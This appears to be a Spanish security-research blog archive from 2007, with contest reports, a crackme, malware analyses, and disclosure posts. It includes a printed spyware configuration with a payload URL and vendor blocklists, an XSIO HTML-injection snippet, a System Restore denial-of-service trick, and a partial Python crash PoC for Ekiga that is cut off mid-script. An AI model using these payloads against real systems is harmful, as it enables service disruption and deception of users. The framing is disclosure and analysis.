HackIt! Navarparty 5

El pasado fin de semana, del día 20 al 23, se celebraba la quinta edición de la Navarparty.

Como ya se ha comentado en este blog, S21sec patrocinó el concurso de HackIt! además de impartir un interesante taller sobre Seguridad en VoIP.

La prueba de HackIt! consistió en 10 pruebas en las que el objetivo era obtener una contraseña válida. Cada prueba superada daba una cantidad de puntos dependiendo de su dificultad. Desde el Viernes 21 a las 17:00 los asistentes a la party podían apuntarse y comenzar el juego que acabó el Domingo, poco antes del final de la party.

El final estuvo especialmente interesante, ya que solo había un punto de diferencia entre el 1º (Zelai) y el 2º clasificado (Huinen) que estaba resolviendo una prueba que valía 3 puntos cuando se cerro el plazo.

Zelai (Ganador) en la entrega de premios

Nuestra enhorabuena a los 2 ganadores que se han llevado un Monitor panorámico de 22 inch y una impresora de fotos de alta calidad para el primer clasificado y un disco duro multimedia y cafetera para aguantar las largas noches de hacking para el segundo clasificado.

Huinen (2º clasificado) recibe premio

Solución al Reto

Os presentamos las soluciones recibidas para el Reto que publicamos el día 14 de septiembre.
Antes que nada, agradecer la participación a todos aquellos que lo hayais intentado, y felicitar a Solid y Victor por haberlo conseguido.

El crackme presentaba las siguientes protecciones:

- Ofuscación mediante introducción de código muerto.
- Comprobación en el TLS (Thread Local Storage) de una máscara de bytes en memoria para cada proceso, buscando el proceso OllyDbg 1.10 en ejecución.
- Detección de un depurador utilizando VEH (Vectored Exception Handler), con un SEH(Structured Exception Handler) utilizado únicamente para tratar de ocultar el VEH.
- Rutina de comprobación matemática simple condicionada por las dos detecciones anteriores.

Como ejemplos de códigos correctos tenemos:

...o las soluciones recibidas:
Solid - -3122
3999999 - 2875

Teneis ambas soluciones disponibles:
- Solución de Solid
- Solución de Victor

Cabe destacar como Solid ha engañado al programa haciéndole creer que el depurador no está presente, de manera que intentando saltarse la protección del SEH ha conseguido saltarse también la protección del VEH. Si hubiera tratado simplemente de detener la ejecución en el manejador de excepciones instalado, posiblemente se habría topado con que al final las cuentas no salían.
También se debe mencionar que Victor, al realizar un análisis estático, no era víctima de las trampas anteriormente mencionadas. Como último detalle, aclarar que la función a la que hace referencia en su solución en realidad es una función que devuelve la raiz cuadrada del valor dado como parámetro.

Con esto damos por cerrado el primer reto, pero el juego no termina aquí.
Proximamente publicaremos más retos, y habrá premio para el ganador, asi que permaneced atentos al blog.

Copias de seguridad automaticas

Seguro que muchos de vosotros usais software de control de versiones para vuestros proyectos, como cvs, svn, monotone, git y familiares. Pero si no quereis instalaros una herramienta de ese tipo y usais Windows(Tm) podeis usar "Restaurar Sistema" en vuestro beneficio. El proceso es bastante sencillo. Haceis una copia de vuestro documento y le cambiais la extension a .sdb, a partir de entonces, cada vez que hagais una actualizacion a ese documento, Windows, a traves de su herramienta Appfix hara un punto de restauracion del sistema con la nueva version del documento. Se puede hasta comprimir el trabajo del dia en un zip, cambiar la extension y machacar el anterior para que Appfix vea que se ha hecho un cambio y lo almacene. Con volver a un punto de restauracion anterior tendremos el fichero que queramos.

Bueno, y todo esto, ¿que tiene que ver con la seguridad? Si un malware llega a nuestro ordenador, solo haciendo una copia de si mismo con la extension .sdb obliga al sistema a incluirlo en un punto de restauracion. Si nombramos nuestra base de datos de 500MB con extension .sdb, cada vez que la actualicemos el sistema hara una nueva copia de seguridad, bloqueando nuestro SGBD y haciendo una cantidad de accesos al disco duro tan grande que ralentiza todo el sistema. Ademas, cuando se llena el espacio asignado a "Restaurar Sistema" tiene que eliminar lo anterior, llevandolo a un punto donde solo existe con el malware. Seguro que muchos se os ocurren formas de provocar un fallo o un DoS en Windows(Tm)

Y no solo WindowsXP(Tm) tiene este "feature", al comprobar si WindowsVista(Tm) tenia una similar, se quedo bloqueado durante 1 hora con un "Espere...", Ctrl+Alt+Supr daba un error y no permitia salir del sistema y hubo que apagar el ordenador con un hard-reset.

Listado de anti-spywares gracias a un spyware

Analizando un spyware que encontramos en Internet, nos topamos con su fichero de configuración, desde el que se configura su modo de funcionamiento. En él aparecen los dominios no permitidos de visitar por parte del ordenador infectado, así como algunas 'palabras malas' que no se permiten usar.

Es bastante autodescriptivo. No están todos los que existen, pero nos sirve para hacernos una idea de frente a qué programas se protegen algún tipo de spyware. En concreto, casualmente, es una versión del mismo que comentamos hace unos días, not-virus:Hoax.Win32.Renos.kj

[general]
ballintmin=2
ballintmax=3
winintmin=15
winintmax=20
ie_interval=15
a_s=http://spyxxx2007.com/download.php
a_slen=


[blacklist]
count=17
domen1=spy-xxx.com
domen2=perfect-cleaner.com
domen3=system-stable.com
domen4=secure.onemomentpay.com
domen5=online-security-experts.com
domen6=extraprivacy.com
domen7=google.com
domen8=msn.com
domen9=yahoo.com
domen10=vnmxjcx.com
domen11=spyaway2007.com
domen12=perfectcleaner2007.com
domen13=top-antispyware-reviews.com
domen14=antispysolutions.com
domen15=livewinupdates.com
domen16=antispystorm.com
domen17=diocleaner.com


[badwords]
count=153
word1=spyaway
word2=perfectcleaner
word3=systemstable
word4=RegFreeze
word5=100% Anti-Spyware
word6=Npust Anti-spyware
word7=Max Spyware Detector
word8=Advanced Anti Spy
word9=Max Anti Spyware Pro
word10=InfoArmor Anti-Spyware
word11=PC Security Suite
word12=Advanced Anti Keylogger
word13=W8Soft Ad-Spy Remover
word14=Spy Stalker
word15=PAL Spyware Remover
word16=Anti-Spyware Bot
word17=Acronis Privacy Expert Corporate
word18=Spyware Protection Pro
word19=Mastr Scan
word20=Anti-keylogger
word21=NoAdware - Spyware Adware Remover
word22=NOADWARE - Spyware Remover
word23=Spyware Hospital
word24=Anti-Spyware Blocker
word25=Anti Spyware Defence
word26=Adprotect
word27=PestBlock Deutsch
word28=Spyware Nuker
word29=SpyHeal
word30=Spyware Scanner
word31=SpyOnThis
word32=ShadowUser
word33=ShadowSurfer
word34=Scan and Repair Utilities
word35=Spy On This - Spyware Adware Remover
word36=Max Secure Spyware Detector - Enterprise
word37=XoftSpySE
word38=007 Agent Antispyware
word39=WinAntiSpyware
word40=SPYWAREfighter
word41=PestBlock
word42=PC Protect Your PC
word43=Pop-Up Stopper Anti-Spyware
word44=spybot
word45=Privacy Defender - stop Spyware
word46=Spyware Detect and Remove
word47=Safe n Sec Plus Anti-Spyware
word48=Anti Virus - Spyware remover - Adware removal
word49=Spyware Nuker
word49=Spyware Nuker Pro Suite
word50=XoftSpy
word51=1Click Spyclean
word52=! Spy Sniper - Advanced Spyware Remover
word53=Spy Killer
word54=Spyware Nuker XT
word55=WinProxy Secure Suite
word56=Spy Emergency - Spyware Remover
word57=Spyware Bot - Spyware Remover
word58=Spy Fighter Cleaner Pro - Spyware Remover
word59=Spyware Bot - Spyware Remover
word60=SpywareBot
word61=Spy Eraser
word62=STOPzilla
word63=Spyware Bot Spyware Adware Remover
word64=Spyware Defender
word65=Spyware Killer
word66=The SHIELD Deluxe Anti-Virus, Anti-Spy
word67=Adware Deluxe
word68=Best Flobo Free AntiSpyware
word69=Best Flobo Free Anti Spyware Clean
word70=Emjysoft Anti-Spam
word71=Spyware Scanner
word72=Anti Trojan Elite
word73=Adware Killer
word74=Spyware Terminator
word75=The Shield_Deluxe
word76=SpyDestroy Pro
word77=Spy Destroy -Spyware Remover
word78=TRVProtect
word79=Trend Micro OfficeScan
word80=Spy Destroy Professional
word81=MacroVirus
word82=Anti-Spy.Info adware remover
word83=Malware Immunizer
word84=2007 Antivirus/Firewall Pro
word85=The Shield_Pro
word86=Anti Identity Theft
word87=2007 Antivirus Shield
word88=Cyber_Defender
word89=AFS Antispyware
word90=AMacro AntiVirus
word91=PCImmunity
word92=Spy Ferret - Spyware Remover
word93=SpyFerret
word94=Ultimate Defender
word95=AdwareX Eliminator
word96=AntiSpyware 2006 - Spyware Remover
word97=SpyZooka - Spyware Remover
word98=StartGuard Free Edition
word99=F-Secure Internet Security
word100=Keylogger Hunter
word101=VMN Toolbar
word102=Returnil Virtual System
word103=Venom Spyware Remover
word104=Spy Sweeper
word105=PC Security Test
word106=SpyBlocs
word107=a-squared Anti-Malware
word108=eScan Internet Security Suite
word109=True Sword
word110=SpySites Plus
word111=TZ Spyware-Adware Remover
word112=Easy Spyware Scanner
word113=CyberScrub AntiVirus
word114=Super System Helper
word115=XSpy Shield Gold
word116=Spyware Defence and Removal
word117=DiamondCS ProcessGuard
word118=SpywareKill
word119=Spyware Annihilator Pro
word120=Spyware Remover
word121=Anti-Hijacker
word122=QMailFilter
word123=Micro Antivirus Deluxe
word124=My Privacy Total
word125=PC Memory Shield
word126=Go SpyZooka
word127=SDProtector Pro
word128=F-Secure Anti-Virus 2006
word129=Safe n Sec Plus Antivirus
word130=GeSWall Freeware
word131=Spyware IT
word132=Spyware Firewall
word133=Active Shield
word134=Advanced Spyware Remover Pro - Junk Remover
word135=Mailbox Guard
word136=PrivacyKeyboard
word137=Adware Remover
word138=HijackRemote
word139=Appin IT Security and Ethical Hacking
word140=Safe n Sec
word141=Spyware Hunter
word142=Dr.Web anti-virus for Windows
word143=VirusRescue
word144=Principal AntiVirus
word145=xTerminator
word146=sysrlb32
word147=winshell32
word148=tmrsrv32.exe
word149=msorcl32.exe
word150=wmvds32.dll
word151=msdn_lib.dll
word152=antispystorm
word153=diocleaner

Navarparty 2007

Durante el viernes pasado, nuestro compañero Pablo Catalina estuvo en la Navarparty dando una conferencia sobre seguridad en VoIP. En esta charla se estuvo comentando diversos ataques, tanto a nivel de red, como ya más dedicadas a los diferentes protocolos existentes de VoIP (e.g. SIP).

Además de contarnos con todo lujo de detalles los ataques que se pueden realizar en un taller que duró casi 3 horas, lo mejor de todo es escuchar a Pablo puesto que nos demostró de forma práctica todos los ataques, además de verle disfrutar de su mando de la Wii+Nunchaku a modo de puntero y ratón.

S21sec participó no sólo dando el taller de Seguridad en VoIP, sino también como patrocinador. Sin olvidarnos por supuesto que varios compañeros (Roumen, Patxi) forman parte de la organización de la Navarparty.

Desde aquí felicitar a los organizadores puesto que todo salió a la perfección y esperamos que disfrutárais de la charla de Pablo.

¡Nos vemos en la siguiente!

De Psiquiatras y Mineros.

Según Wikipedia, la Minería de Datos o Data mining es "La extracción de información potencialmente útil, no trivial, implícita y desconocida a partir de datos previamente conocidos"...

A veces la Minería de Datos puede ser tan sorprendente como una visita al Psiquiatra: "Su problema es complejo Sr. Log; tiene la rara costumbre de girar sobre sus talones 360º antes de pasar por una puerta, y además, si la puerta es verde, da dos palmadas. También es extraña su tendencia a lanzarse contra las farolas sin previo aviso, al menos tres veces al día [...]. Pero puede estar tranquilo, hemos descubierto el origen de su dolencia y tenemos el tratamiento adecuado: No vuelva a bajar de su casa por las escaleras, use siempre el ascensor."

La situación parece bastante compleja, y el Psiquiatra un ente superior muy poderoso. Pero lo que no se cuenta es que para dar con el origen del problema, y el tratamiento adecuado, el Psiquiatra ha tenido muy en cuenta una de las más potentes herramientas que tenemos a nuestro alcance cuando se trata de descubrir información oculta entre grandes volúmenes de información: la Minería de Datos.

Las prácticas de Data Mining se aplican en los más diversos campos: agricultura, economía, deporte... y permiten la inferencia y evaluación de patrones de comportamiento que a primera vista serían imposibles de deducir. Para ello, se utilizan algoritmos de tratamiento de información, desde los más simples y conocidos (estadísticos, relacionales, predictivos...) hasta los más actuales (algoritmos genéticos, inteligencia artificial, redes neuronales, etc).

Cuando hablamos de Seguridad, el Data Mining es esencial si se quiere que la gestión de la prevención se adelante a los patrones y técnicas que puedan comprometer los sistemas. Pensemos en la información sensible más crítica para cualquier organización: Sus Logs de seguridad.

Ingentes cantidades de logs se reciben diariamente y quedan almacenados sin otra misión que la de cumplir la ley. Hasta hace poco tiempo, estos datos eran valorados por las empresas como un mero recurso para la detección de problemas en tiempo real, o como origen de datos para la realización de análisis forense tras un incidente, cuando en realidad pueden ser la fuente para descubrir las vulnerabilidades y deficiencias globales en sus infraestructuras tecnológicas.

Actualmente hay un buen número de estándares , certámenes y software dedicados en exclusiva a este campo, cuya integración implica gran cantidad de recursos que pocas compañías pueden asumir. Pero también es posible utilizar solamente aquellas piezas del rompecabezas que más se adapten a las necesidades concretas para ciertos conjuntos de datos. La Teoría de la Información es la base para un acercamiento práctico a esos problemas concretos; un ejemplo sencillo sería el concepto de entropía de información, que se define como "Medida de la incertidumbre existente ante un conjunto de mensajes, de los cuales se va a recibir uno solo", y este conjunto encaja exactamente con nuestro objetivo: los Logs de Seguridad.

La aproximación es sencilla: un servicio en producción cualquiera mantiene un patrón de comportamiento repetitivo, y cualquier variación en estos patrones tiene un significado concreto (caídas, picos de carga, ...). La variación en estos patrones, cuando hablamos de Logs, generalmente se tratan posteriormente a la recepción de los eventos, y solo con consultas previamente decididas. El calculo de la entropía de cada evento en relación con el conjunto de los mismos, puede ayudarnos a discernir cuando lanzar las consultas concretas ante los cambios relevantes en un Log. No podemos extendernos con el código, pero hay algún artículo bastante descriptivo, y en PhpMath hay numerosos ejemplos y métodos aplicables a la Minería de Datos sobre Texto.

Estas técnicas no se aplican solo como medidas de defensa y prevención. Como sabemos, un buen número de intrusiones, robo de datos y ataques se han llevado a cabo gracias a información extraída con estos métodos. Ambos bandos luchamos con armas parecidas.

Como vemos, nuestro Psiquiatra, gracias a las muchas sesiones en las que el paciente le contaba cosas aparentemente inconexas e irrelevantes, ha podido deducir que eran las escaleras de casa de su paciente las que desencadenaban unos recuerdos traumáticos reprimidos, a los que respondía con actos anómalos en ciertas situaciones, todas relacionadas con una situación grave que ya olvidó: (su chica le dejó en las escaleras de un hotel con puertas verdes giratorias, y al cruzar la calle corriendo a buscarla, se rompió la nariz contra una farola [...], lo que demuestra que la Minería de Datos y los psiquiatras nos ayudan a descubrir cosas que de otra forma, nunca sabríamos que estaban ahí.

Participamos en el evento "Asegurate de que está seguro"

Evento sobre Seguridad Organizado por Microsoft

04 de octubre de 2007, jueves, a las 9:30

Centro de Formación en Tecnologías de la Información y Comunicaciones Madrid-Sur
Avenida Arcas del Agua s/n
Sector 3 Getafe Madrid 28905
España

En el evento se tratarán temas como la auditoría de seguridad, la Seguridad en aplicaciones web, en red interna y nodos de aplicaciones LDAP

Por parte de S21sec Alberto Moro, Security Researcher y experto reconocido a nivel nacional, nos mostrará técnicas para realizar un test de intrusión a una aplicación web así como los fallos más comunes en la arquitecturas de las aplicaciones web hoy en día.

Es un evento gratuito y puedes inscribirte a través de la web de Microsoft

Esperamos que os resulte de interés y que nos podamos ver todos por allí.

Caos Total

El pasado 7 de Septiembre se estrenó en España la última película de la saga “La Jungla de Cristal”, que, como era de esperar, estaba repleta de golpes, disparos, explosiones, y mucha, mucha, imaginación. Pero entre todos estos detalles para recordar que estás viendo una producción de Hollywood, llamaba la atención el guión. No se trataba de un secuestro en un hotel, ni de una guerra en el aire, sino que era algo más actual, algo que nos toca más de cerca. 

Se trataba del intento, por parte de un ex de la NSA, de hacerse con el dominio de EEUU a través de medios informáticos. El malo reclutó a los mejores hackers del país con esta intención, y a través de tres fases se iba haciendo con los sistemas de seguridad del gobierno, los sistemas de regulación del tráfico, de telecomunicaciones, para finalmente dejar al país sin los recursos más necesarios tales como la electricidad o el gas. Todo por una módica suma de dinero.



Este escenario es impensable en la realidad,¿lo es? Es la duda que puede surgir después de ver la película. No son pocas las noticias relacionadas con fallos informáticos que han provocado grandes desastres, que han afectado a la vida cotidiana de las personas, incluso intrusiones en sistemas de gran importancia para un país, como pueden ser las centrales nucleares, pero de ahí a controlar todos los recursos informáticos de un país hay un largo trecho. 

Puede darse el caso de que un fallo en un sistema se propague a sus vecinos, pero un ataque global que absorba todos los recursos se antoja imposible, ya que, si bien la gente de a pie no tiene muy en cuenta la seguridad de los sistemas, las empresas con responsabilidades críticas sí se preocupan por este tema. De hecho, existen muchas iniciativas relacionadas con la seguridad en SCADA, teniendo como principal objetivo la protección de Infraestructuras Críticas (sólo hay que ver el número de grupos de trabajo organizados en EEUU o dónde se centra una gran parte del dinero para proyectos del VII Programa Marco)

Pero dejando de lado la perspectiva ficticia, esta película sirve también para recordar que el grado de dependencia tecnológica que nuestra sociedad está adquiriendo paulatinamente es cada vez mayor. No queda lejos la incidencia ocurrida en EEUU, cuando el servicio de los BlackBerries fue interrumpido durante unas horas, provocando, entre otras cosas, el caos en el Congreso estadounidense. En este escenario es importante que los fabricantes y desarrolladores se comprometan con buenas y seguras implementaciones, que la sociedad se conciencie, y que tenga en cuenta las buenas prácticas de seguridad, porque el factor humano, como se ha venido comentando estos días, es determinante en estos casos. De todas formas, aunque es improbable que los malos controlen nuestro país, estaremos alerta por si la voz que nos indica dónde girar nos es familiar ;).

not-virus:Hoax.Win32.Renos.jz

Revisando el análisis de los códigos maliciosos que subimos en nuestro analizador, me ha llamado la atención uno de ellos que en este caso sí que los antivirus detectaban algo raro en él, y lo denominaban 'not-virus:Hoax.Win32.Renos.jz'.

Examinando el comportamiento del mismo, podemos ver que su funcionamiento es sencillo:

1. Se copia él mismo a C:\Windows\xupdate.exe
2. Mira si existe C:\Program Files\SpyShredder\SpyShredder.exe
3. Si no existe, se baja un ejecutable de una página extraña
4. Ese ejecutable es una copia SpyShredder, un supuesto anti-Spyware que limpiará nuestro ordenador de todo el spyware que tenga (sic)

Si buscamos en Google información sobre SpyShredder, sólo encontramos enlaces de cómo quitar esta aplicación de nuestro ordenador. Más aún, si buscamos en Google dónde descargar SpyShredder, sólo encontramos enlaces de redes P2P para bajarnos el programa.

Si lo ejecutamos, lo que hace es avisarnos de que nuestro ordenador está lleno de programas maliciosos (biggest malware threats), y que por supuesto, necesitamos comprar una versión más avanzada de SpyShredder y de programas parecidos (en la misma página está SpySheriff, un viejo conocido) para solucionar nuestro problema.

¿Cómo podemos clasificar este tipo de programas? Los antivirus lo denominan Hoax, esto es, un intento de engañar/asustar al usuario alertando sobre el peligro de algo que no real, en castellano, estafa, engaño o simplemente timo. ¿Tiene sentido que lo detecten los antivirus? En mi opinión, no mucho, puesto que si de repente en mi ordenador aparece la pantalla de más arriba sin yo haber solicitado nada de ese tipo, esta claro que es algo sospechoso, pero también es verdad que nunca está de más que te avisen.

¿Qué objetivo tienen estos programas? Cómo hablamos hace un par de días sobre el eslabón más débil, el principal objetivo es asustar al usuario para que realice una acción en beneficio del sujeto que le envía el hoax.

La semilla del mal

Envueltos como estamos en el uso de gran cantidad de software y viendo que si revisamos las listas de vulnerabilidades observamos que cada día nos obsequian con una buena y nueva ración de las mismas. Es posible que el lector en algun momento se pregunte ¿cuál es el motivo subyacente en la gran mayoría de estos fallos? Es lo que, hemos apodado "La semilla del mal", y esto es, el tratamiento de cadenas.

Nótese que cualquier aplicación (tanto un binario nativo como una aplicación script para web) no es más que un conjunto de algoritmos que, en base a un estímulo (solicitud, acción) realizan un proceso sobre un cojunto de datos para devolver una respuesta. Aquí es donde entra en juego nuestra semilla, y es que, por regla general, los estímulos en muchas ocasiones son cadenas. Si observamos el escenario web, observaremos que, cuando introducimos un comentario en un foro lo que estamos enviando son una serie de cadenas de texto las cuales incluirán, probablemente, una cadena que nos identifica como usuario registrado del foro y una cadena que contiene nuestro comentario. Dichas cadenas serán almacenadas y se mostrarán cuando otro estímulo haga que la aplicación muestre dichos datos.

Imaginemos otro escenario, supongamos una aplicación en ejecución en nuestro sistema con más privilegios que los de nuestro usuario. Dicha aplicación nos ofrece un interfaz para rellenar un formulario de datos. Lo que se introduzca en dicha interfaz será procesado por esa aplicación o un web service, que recibe una solicitud.. ¿Cómo está relacionado esto con nuestra semilla del mal? Básicamente todo gira alrededor de un tratamiento incorrecto de la información que se recibe de entrada, la gravedad de la vulnerabilidad queda sólo en manos de lo complicado que sea realizar dicha acción (si desde local o remoto, o se necesitan requisitos previos como un usuario) y de lo que pueda llegar a producir la acción. Como tratamiento incorrecto de la información, entenderemos una situación no contemplada en el código que compone la aplicación ante una información con formato incorrecto que pueda derivar en el mal funcionamiento del mismo. Por ejemplo, si tomamos como referencia el ejemplo web y teniendo en cuenta que, el software que representa la página muestra los datos previamente insertados (el post en el supuesto foro) y tambien ejecuta el propio código de la página en si (para darle su formato, etc). ¿Podríamos insertar en nuestro inocente comentario código script que fuera ejecutado por dicho software? claro, y de esta forma ejecutar un script en el servidor que nos muestre por ejemplo el hash de la contraseña de administrador de la web. ¿Podríamos introducir en el interfaz de la aplicación una cadena que excediera la longitud máxima permitida sobreescribiendo así parte de la memoria y permitiendonos de esa forma alterar el flujo del programa? ¡Por supuesto!. Afortunadamente, las aplicaciones se realizan (o al menos eso quiero pensar) teniendo en cuenta estas circunstancias y dotando al algoritmo de unos filtros previos para eliminar o atajar cualquier información incorrecta que pudiera lograr un mal funcionamiento del mismo.

El problema reside en que no siempre es así y uno es más consciente de ello al ver vulnerabilidades como la reciente de Quicktime+Firefox ( http://www.securityfocus.com/archive/1/479179/30/0/threaded ) o bien, el simple robo de contraseña de una cuenta de Second Life ( http://hackademix.net/2007/09/16/ie-non-bug-vs-second-life/ ) aunque estos son ejemplos de masas, cualquier aplicación de intranet, cualquier formulario externo, cualquier sistema de petición de datos de cualquier empresa puede ser comprometido sólo por alguien curioso con ganas de probar.

¿Es su aplicación segura?

El rival más débil

Hace ya unos años se emitía el programa 'El rival más débil' (posteriormente a su éxito en la BBC como 'The weakest link'). En este programa se realizaba una serie de preguntas a los concursantes, y después entre ellos votaban para echar al que consideraba 'el rival más débil', ya sea porque no hacía ningún bien al equipo y no ganaban dinero, o porque en él veían una amenaza a la hora de ganar el premio (sólo podía quedar uno).

En él, aparte de observar la destreza de los concursantes, primaban los comentarios irónicos de la presentadora (la que más tiempo estuvo, fue luego más conocida por su papel en los Serrano), intentando presionar a los concursantes para que mostraran su debilidad.

Recientemente se ha hablado mucho en la prensa de cómo es posible que existan esas grandes fugas de información (se habla desde el Pentágono hasta Ferrari, pasando por Danone o nuestro ejemplo del autobús alemán) y muchas de ellas (por no decir todas) tienen en su origen en el eslabón más débil: el ser humano.

Si nos centramos en el robo de información a nivel informático, hoy en día tenemos varias posibilidades, según hemos ido observando en el paso del tiempo:

• Envío dirigido de un contenido que explota una vulnerabilidad: desde un simple correo que afecta a nuestro lector de correo, hasta un documento Word, PDF o Powerpoint. Simple y eficaz. Si le sumamos la utilización de una vulnerabilidad no conocida (zero-day) podemos infectar al eslabón más débil, puesto que si adornamos el paquete con un bonito envoltorio (fotos, familia, pornografía, humor), casi seguro que lo abrirá (o a veces no necesitará ni abrirlo).
• Infección en una página web con contenido malicioso para que al visitar esa página, nos infectemos silenciosamente (recordáis el MPack, WebAttacker, IcePack, NuclearKit, ...). Cada vez se ve más este tipo de ataque, y el problema es que son páginas que, en teoría, son totalmente inofensivas (Bank of India, miles de sites en Italia, ...)
• Explotar directamente el sistema operativo. Esta técnica cada vez está más en desuso y, aunque famosa hace mucho tiempo (Blaster, Sasser, ...) realmente poco útil si intentamos robar datos de una organización (tenemos cortafuegos personales, seguridad en perímetro, etc...). Aunque recordemos el eslabón más débil, cuando ya no estamos tan protegidos (por ejemplo en un aeropuerto conectándonos al WIFI, o en un hotel, en casa de unos amigos, ...) somos capaces de deshabilitar todos los elementos de seguridad para que nos funcione mejor, nos vaya más rápido, etc...
• Desde dentro. ¿No es fácil pinchar un punto de acceso wireless a una red interna por parte del personal de seguridad, personal de limpieza o un empleado descontento, para posteriormente acceder desde fuera del edificio y eliminar rastros? O pinchar un USB en el ordenador al que se quiere acceder, o simplemente dejar unos cuantos USB 'despistados' y por supuesto, maliciosos, en el garaje de la empresa para que la gente los coja y los pinche a sus equipos.

¿Qué podemos hacer para evitar todos estos riesgos? Seguridad en capas (Defense in depth), sin concentrar todos nuestros esfuerzos en la capa exterior de riesgo, sino seguir una estrategia de proteger todos nuestras capas de cualquier proceso de negocio.

Como ejemplo, y relacionado con los casos anteriores, podemos pensar primero en controlar qué información sobre la empresa existe en Internet, ofrecer una protección perimetral con dispositivos UTM que nos realicen filtrado de todo tipo de tráfico, pero a la vez, comprobando que nuestras páginas no han sido comprometidas ni pueden serlo (Auditorias, servicio WebMalware), teniendo una política de seguridad adecuada y controlando todos nuestros riesgos (análisis de riesgos, planes de contingencia, adecuaciones con la Ley, ...), gestionando de forma eficiente todos nuestros eventos, incidentes y servicios de seguridad, controlando el acceso a nuestra red (802.1x) y los protocolos que fluyen en ella, monitorizando nuestras redes wireless, asegurando el puesto de usuario contra posibles fugas de información, o ataques dirigidos, ... el número de capas es el que nosotros deseemos aplicar, pero sin olvidarnos que no tenemos que dejar ningún punto de fallo, y, por supuesto, recordar quién es el eslabón más débil.

Como podéis comprobar, tenemos muchos métodos para intentar introducir nuestro 'código malicioso' (llámese troyano, punto de acceso, sniffer o como deseemos) dentro de una empresa. Pero ahora sumémosle el hecho de dirigir nuestro ataque a una persona de confianza dentro del ámbito de nuestro objetivo (familia, compañeros de deporte, amigos, ...), como hacen desde hace muchos años los gusanos que se propagan por redes sociales (el gusano que busca tus contactos y se autoenvía a todos ellos, o mira tu agenda de teléfono para enviarse por SMS, o tus contactos de Messenger, Skype, ...). Es fácil intentar vulnerar nuestra confianza, puesto que, como siempre, es más sencillo atentar contra el eslabón más débil, ya que, al fin de todo, somos personas, no máquinas, aunque a veces pretendamos ser lo contrario.

Storm: ¿con qué nos sorprenderá?

La última ola de los e-mails que intentan infectar a todos los ordenadores de Internet utilizan un nuevo señuelo para captar a sus víctimas: los juegos de toda la vida. Con mensajes del tipo 'Stop paying for games' o 'Get 1000 games for free', al acceder a la página que viene en el correo nos aparece una como la siguiente:

Pinchando en cualquiera de ellos nos bajaremos siempre el mismo archivo, ArcadeWorld.exe, que es reconocido como Zhelatin.jp, lo extraño es la fecha de compilación del mismo, un poco antigua para las fechas en las que estamos (nos suena extraño puesto que hemos visto últimamente muchos binarios pertenecientes al Storm con fechas de compilación actuales):

También la página al final trae un regalo envenenado intentando infectar tu ordenador, en forma de Javascript ofuscado y con mensajes subliminales hacia Kaspersky (function kaspersky(suck,dick){}; function kaspersky2(suck_dick,again){})

Eso sí, el funcionamiento es el mismo de siempre.

Un pequeño reto

El día de hoy os presentamos el primero de una serie de retos que iremos presentando esporádicamente.

En esta ocasión se trata de un crackme, al que habrá que aplicar ingeniería inversa para tratar de entenderlo y solucionarlo.

Podeis descargároslo de aquí.

Objetivos del crackme:

1.- Obtener las claves correctas.
* No se permite parchear
* No se permite aplicar fuerza bruta
2.- Desofuscar el código ofuscado.
3.- Comprender las técnicas anti-debug utilizadas.
4.- Enviar los detalles de los tres puntos anteriores a labs@s21sec.com ;)

Como podreis comprobar, el fichero no se ha empaquetado, y la ofuscación es muy simple.

Estad atentos al blog, próximamente se publicará la solución.

...y esperamos que sean las enviadas por vosotros.

S21sec labs en EnRedAndo

La semana pasada nuestros amigos de EnRedAndo estuvieron conversando con David Barroso del departamento de I+D+i de S21sec (S21sec labs) en su CiberTxoko sobre la 'Seguridad de los Datos en Internet'.

EnRedAndo se puede escuchar directamente de la radio, o sino es posible también acceder a cada programa mediante el podcast que ofrecen semanalmente. Tanto EnRedAndo como su hermano 'El Guardián' son programas informativos altamente recomendables que suelen tocar temas de Seguridad Informática y comentar, de manera instructiva, cualquier noticia relacionada con la Seguridad.

Desde aqui mandamos un saludo al equipo de EnRedAndo y del Guardían y esperamos volver a vernos dentro de poco.

Puedes acceder directamente al contenido del podcast.

XSIO

Recientemente se ha publicado un artículo en el que se explica cómo explotar una vulnerabilidad a la que su autor ha bautizado como XSIO.

Esta vulnerabilidad explota el hecho de poder subir una imagen a una página web, con un código extremadamente simple (véase ejemplo) y así poder inyectar una nueva imagen fraudulenta.

Ejemplo de código:

<a h r e f = h t t p : / / d i s e n c h a n t . c h>

<img s r c = e v i l . g i f

s t y l e = p o s i t i o n : a b s o l u t e ; l e f t :1 2 3 px ; t o p :1 2 3 px ; />

</a>

El problema de poder inyectar una imagen, con una redirección a otra página es que puede ser algo tan sencillo y poco “malintencionado” como gastar una broma, como realizar ataques más peligrosos hacia los usuarios que visualizan la página web vulnerable.

Posibles ataques pueden ser, desde colocar una imagen que sustituya toda la página web por otra fraudulenta, desinformación incluyendo dentro de la imagen datos erróneos, phishing al redirigir al usuario desde un dominio supuestamente seguro a otro fraudulento, etc…

Es destacable cómo se buscan cada día nuevas vulnerabilidades para poder ser explotadas, pero en contrapartida cómo se estudian éstas para ser solventadas y predecir otras futuras en nuevas versiones de diferentes productos.

Sobre la vulnerabilidad del Ekiga: explicación y PoC

Si estás interesado en obtener más información sobre la vulnerabilidad de Ekiga publicada hoy (notificada al equipo de Ekiga en Julio de 2007) entonces esta entrada del blog es la que estabas buscando.

El bug se debe a un tema de reasignación de memoria y de bloqueos al mandar una dirección SIP larga(1005 A's) desde la función SIPURL::GetHostAddress que es donde se extrae la cadena de A's.

Este bug parece que se resolvió exactamente en la siguiente revisión de ekiga: http://openh323.cvs.sourceforge.net/openh323/opal/src/sip/sipcon.cxx?r1=2.120.2.25&r2=2.120.2.26&pathrev=v2_2_9

La parte vulnerable del código es la siguiente:

OpalTransportAddress SIPURL::GetHostAddress() const
{
PString addr = paramVars("transport", "udp") + '$';
if (paramVars.Contains("maddr"))
addr += paramVars["maddr"];
else
addr += hostname;
if (port != 0)
addr.sprintf(":%u", port);
return addr;
}

La prueba de concepto es la siguiente (PoC):

#!/usr/bin/python

# ekiga207_crash by José Miguel Esparza

# 2007 S21sec Labs

import sys,socket

if len(sys.argv) != 3:
print "Usage: ekiga207_crash.py target_host target_port\n"
sys.exit(1)
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE "+'A'*1005+" SIP/2.0\r\n"+\
"Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\r\n"+\
"Contact:sip:pepe@172.91.1.133:5060\r\n"+\
"Content-Length:417\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:pepe@172.91.1.148:5060;tag=a48s\r\n"+\
